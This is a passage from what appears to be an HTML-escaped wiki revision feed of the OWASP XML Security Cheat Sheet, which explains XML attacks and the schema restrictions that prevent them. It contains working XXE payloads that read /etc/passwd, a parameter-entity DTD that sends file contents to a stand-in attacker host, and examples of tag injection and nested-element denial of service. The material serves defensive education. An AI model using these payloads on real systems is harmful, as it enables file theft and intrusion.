  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224421</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224421"/>
				<updated>2016-12-21T20:06:15Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
 &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
